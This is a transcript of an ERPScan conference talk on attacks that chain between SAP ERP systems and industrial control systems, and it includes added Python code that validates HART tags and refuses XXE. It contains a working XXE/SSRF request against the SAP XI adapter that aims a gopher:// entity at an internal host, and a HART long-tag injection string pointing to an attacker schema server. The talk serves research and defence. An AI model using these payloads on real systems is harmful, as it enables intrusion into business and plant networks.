Business breakdown vulnerabilities in ERP via ICS and ICS via ERP

Transcript of Business breakdown vulnerabilities in ERP via ICS and ICS via ERP

Invest in security to secure investments

Business Breakdown Vulnerabilities in ERP via ICS and ICS via ERP

Alexander Polyakov, CTO ERPScan, President EAS-SEC

About ERPScan

• The only 360-degree SAP Security solution - ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team - 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)

What do they look like

(Diagram of a typical landscape: SAP Portal, HR, BW, ECC, Billing, BI, IS, CRM, SRM, SolMan, SAP AS, XI/PI; connected parties Suppliers, Customers, Banks, Insurance, Partners, Branches; and the plant side PAS/EAS, MES, SCADA/DCS, OPC, PLCs and field devices.)

How popular they are

SAP
• More than 246,000 customers worldwide
• 86% of Forbes 500

Oracle
• 100% of Fortune 100

Microsoft
• More than 300,000 businesses worldwide choose Microsoft Dynamics ERP and CRM software

What can happen

• Espionage
  – Theft of financial information
  – Trade secret theft
  – Supplier and customer list theft
  – HR data theft
  – Other corporate data theft
• Sabotage
  – Denial of service
  – Modification of financial statements
  – Access to the technology network (SCADA/ICS) via trust relations
• Fraud
  – False transactions
  – Modification of master data


How easy is that

Systems should be connected with each other:
• Directly
  – ERP collects information from PAS/EAS
• Indirectly
  – ERP shares a database with MES/EAS
  – ERP is connected with ICS/SCADA via an XI or PI system
• In one network
  – Exploit typical vulnerabilities, e.g. password sniffing
• In different networks
  – Exploit trust relations

Internet to Internal

• Via Internet resources (SAP Portal/CRM/SRP)
• Via Partners (SAP XI)
• Via SAP Router
• Via Workstations (Trojans)
• Via unnecessary SAP services in the Internet

How to break SAP?

At least:
• Unnecessary privileges
• Misconfigurations
• Vulnerabilities
• Custom code issues

Unnecessary privileges

• One example: Create vendor + Approve payment order
• Usually ((~100 roles × 10 actions)^2)/2 = 500k
• 500k potential conflicts for each user!
• A lot of work
• Usually takes two years to decrease conflicts from millions to hundreds.

Misconfigurations

~1500 profile parameters
~1200 web applications
~700 web services
~100 specific commands for mmc
~100 specific checks for each of the 50 modules

Misconfigurations

1. Lack of patch management
2. Default passwords
3. Unnecessary enabled functionality
4. Remotely enabled administrative services
5. Insecure configuration
6. Unencrypted communications
7. Internal access control and SoD
8. Insecure trust relations
9. Monitoring of security events

Vulnerabilities

Only one vulnerability is enough to get access to ALL business-critical DATA

(Chart: notes per year, 2001–2014; y-axis 0–900.)

By July 2014 – 3000+ notes

From ERP to ICS

Some systems should be connected at least on the network layer.
• SAP RFC links
• Database links
• Same domain
• Similar passwords

TRUST CONNECTIONS – the main issue

PART 2 (From ICS to ERP)

From ICS/Devices to ERP

• USB (like Stuxnet)
• Wireless devices (usually bad encryption)
• Wired devices (need physical access)
• Attack on wire (low-level field protocols)
  – RS485
  – Profibus PA
  – FF H1
  – HART

Big  Big  Company  



From ICS to ERP

(Diagram: corporate network with ERP and MES; routers/firewalls; plant network with OPC, SCADA/DCS and HMI; PLC1, PLC2,3…, PLC7,8… and field devices on the industrial bus.)

From ICS to ERP

• HART (current loop, 4-20 mA)
• Mostly used in power plants, chemical factories and the oil & gas industry
• Every field device (in general, every device) in a PAS industrial facility hierarchy has a unique ID
• For HART devices, the HART long tag is used as a universal ID
• The HART tag (8 bytes packed ASCII) and HART long tag (32 bytes ASCII) are used as the application-layer address

Vulnerabilities

DEMO Infrastructure

(Diagram: corporate network with the ERP; firewall (only HTTP traffic allowed); FieldCare (PAS) on Ethernet; HART modem; current loop (HART analog 4-20 mA line); transmitter.)

Vulnerabilities

ICSCorsair board

Attack Scheme

(Diagram of the attack scheme, with its labelled components in order: attacker on the current loop; HART Command 22 long tag change packet; HART transmitter; HART gateway/master; XML data carrying A' xmlns='x-schema:http://q45.ru (XMLI) into the PAS (FieldCare); request for a remote XSD schema to an evil web server over the Internet; reply (XSD with SSRF); SSRF; SAP remote command execution exploit query to the ERP; RCE.)
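The HART tag formats described above (8-character packed ASCII tag, 32-byte long tag) and the attack scheme, where a Command 22 long-tag change carries XML into the PAS, come down to one defensive rule: a string read from a field device is untrusted input. The following is an added example, not FieldCare's or ERPScan's code. It assumes the PAS decodes the packed tag (four characters per three bytes), applies an allow-list of its own choosing (the character set below is this example's policy, not part of the HART specification) and builds its XML record with a serializer that escapes the values, so a tag like the one on the slide can only ever become attribute text.

```python
"""Validating device-supplied HART tags before a PAS puts them into XML.

Added example (not FieldCare's or ERPScan's code). Assumptions: the PAS
receives the packed-ASCII HART tag and the long tag (up to 32 bytes) read
from the transmitter and builds its own XML record from them; the allow-list
below is this example's policy, not HART's.
"""
import re
import xml.etree.ElementTree as ET

LONG_TAG_MAX_BYTES = 32
# Policy for this example: letters, digits, space, '_', '-' and '.' only.
LONG_TAG_ALLOWED = re.compile(r"^[A-Za-z0-9 _.\-]+$")


def unpack_packed_ascii(data: bytes) -> str:
    """Decode HART packed ASCII: four 6-bit characters in every 3 bytes.

    Packed ASCII covers the 64 characters from ' ' (0x20) to '_' (0x5F); the
    two high bits are dropped on the wire and restored here.
    """
    if len(data) % 3:
        raise ValueError("packed ASCII data must be a multiple of 3 bytes")
    chars = []
    for i in range(0, len(data), 3):
        word = int.from_bytes(data[i:i + 3], "big")          # 24 bits
        for shift in (18, 12, 6, 0):
            v = (word >> shift) & 0x3F
            chars.append(chr(v + 0x40 if v < 0x20 else v))    # 0x00-0x1F -> '@'..'_'
    return "".join(chars)


def pack_packed_ascii(text: str) -> bytes:
    """Inverse of unpack_packed_ascii; pads with spaces to a multiple of 4 chars."""
    text = text.upper()
    if any(not (0x20 <= ord(c) <= 0x5F) for c in text):
        raise ValueError("character outside the packed ASCII set")
    text += " " * (-len(text) % 4)
    out = bytearray()
    for i in range(0, len(text), 4):
        word = 0
        for c in text[i:i + 4]:
            word = (word << 6) | (ord(c) & 0x3F)
        out += word.to_bytes(3, "big")
    return bytes(out)


def long_tag_is_valid(raw: bytes) -> bool:
    """Accept a long tag only if it fits in 32 bytes and matches the allow-list."""
    if len(raw) > LONG_TAG_MAX_BYTES:
        return False
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return False
    return bool(LONG_TAG_ALLOWED.match(text.rstrip("\x00")))


def build_device_record(packed_tag: bytes, long_tag: bytes) -> str:
    """Build the XML record with ElementTree so the values are always escaped.

    Even if a tag slips past the allow-list, it can only become attribute
    text: the serializer escapes it, so an injected xmlns= or x-schema:
    reference never becomes markup.
    """
    record = ET.Element("device")
    record.set("tag", unpack_packed_ascii(packed_tag).rstrip())
    record.set("longtag", long_tag.decode("latin-1").rstrip("\x00"))
    return ET.tostring(record, encoding="unicode")


def parse_device_record(xml_text: str) -> dict:
    """Read the record back; returns the attributes the XML actually carries."""
    return dict(ET.fromstring(xml_text).attrib)


if __name__ == "__main__":
    # Constructed inputs: a normal tag and the 32-byte injected long tag from the slide.
    hostile = b"A' xmlns='x-schema:http://q45.ru"
    print("long tag accepted:", long_tag_is_valid(hostile))
    print(build_device_record(pack_packed_ascii("TIC101"), hostile))
```

The allow-list is the first line of defence and the escaping serializer the second; the record built from the slide's payload parses back with exactly the two attributes `tag` and `longtag`, and no `xmlns` or schema reference.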

From ERP to ICS

• SSRF: http://cwe.mitre.org/data/definitions/918.html
• Second place in the Top 10 web application techniques of 2012
• Allows bypassing firewall restrictions and connecting directly to protected systems via connected systems

SSRF

(Diagram: Server A (Portal or XI) at 192.168.0.1 forwards the request to Server B (ERP, HR, BW etc.) at 172.16.0.1, port 3300.)

POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: 192.168.0.1:8000

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >]>
<foo>&date;</foo>

Server B receives AAAAAAAAAAAAA on port 3300, the same as: telnet 172.16.0.1 3300
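The XI SOAP adapter request above declares an external entity so that the server resolves gopher://172.16.0.1:3300 on the attacker's behalf, which is what turns an XXE into SSRF across the firewall. The example below is added here and is not SAP's or ERPScan's code. It assumes the endpoint never needs a DTD, so any DOCTYPE is refused before the document is parsed, and it pairs that with a detector for request logs that reports the entity URI scheme and whether the target is a private address. The request bodies are constructed for the example (the first copies the payload on the slide).

```python
"""Hardened XML intake for a SOAP/XML endpoint plus a log-side detector.

Added example, not SAP's or ERPScan's code. Assumptions: the endpoint never
needs a DTD, so any DOCTYPE is rejected before the document is parsed; the
sample request bodies below are constructed for the example.
"""
import ipaddress
import re
import xml.etree.ElementTree as ET
import xml.parsers.expat
from urllib.parse import urlsplit


class UntrustedXMLError(ValueError):
    """Raised when a document carries a DTD (XXE/SSRF vector) and is refused."""


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML from an untrusted peer, refusing any DOCTYPE declaration.

    The DOCTYPE check runs in a plain expat pass before ElementTree sees the
    bytes, so an external entity such as SYSTEM "gopher://..." can never be
    declared, let alone resolved.
    """
    def refuse_doctype(name, sysid, pubid, has_internal_subset):
        raise UntrustedXMLError(f"DOCTYPE '{name}' not allowed")

    screener = xml.parsers.expat.ParserCreate()
    screener.StartDoctypeDeclHandler = refuse_doctype
    screener.Parse(data, True)          # raises UntrustedXMLError on DOCTYPE
    return ET.fromstring(data)          # DTD-free, safe to parse normally


# External entity declaration: SYSTEM "uri" or PUBLIC "id" "uri".
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<name>[^\s%]+)\s+"
    r"(?:SYSTEM\s+[\"'](?P<sys>[^\"']+)[\"']"
    r"|PUBLIC\s+[\"'][^\"']*[\"']\s+[\"'](?P<pub>[^\"']+)[\"'])"
)


def classify_request(body: str) -> dict:
    """Flag request bodies that declare a DTD with an external entity.

    Reports the entity URI, its scheme and whether it points at a private
    address, which is the pattern in the XI adapter request on the slide
    (gopher:// to an internal host and port).
    """
    result = {"dtd": "<!DOCTYPE" in body, "external_entity": None,
              "scheme": None, "internal_target": False}
    m = ENTITY_RE.search(body)
    if m:
        uri = m.group("sys") or m.group("pub")
        parts = urlsplit(uri)
        result["external_entity"] = uri
        result["scheme"] = parts.scheme.lower()
        host = parts.hostname
        if host:
            try:
                result["internal_target"] = ipaddress.ip_address(host).is_private
            except ValueError:          # a hostname rather than a literal address
                result["internal_target"] = host == "localhost"
    return result


# Constructed request bodies; the first mirrors the XXE/SSRF payload on the slide.
XXE_BODY = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    '<!DOCTYPE foo [\n'
    '  <!ELEMENT foo ANY >\n'
    '  <!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >]>\n'
    '<foo>&date;</foo>'
)
BENIGN_BODY = '<?xml version="1.0"?><foo><date>2014-07-01</date></foo>'


if __name__ == "__main__":
    for body in (XXE_BODY, BENIGN_BODY):
        print(classify_request(body))
        try:
            print("parsed:", parse_untrusted_xml(body.encode()).tag)
        except UntrustedXMLError as exc:
            print("refused:", exc)
```

Refusing the DTD outright is simpler and safer than trying to allow "harmless" internal subsets, and the detector gives the SOC the two facts that matter for triage: a non-HTTP scheme and a private-range target behind the adapter.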

Conclusion

• Critical networks are complex
• A system is as secure as its most insecure component
• Holistic approach
• Check eas-sec.org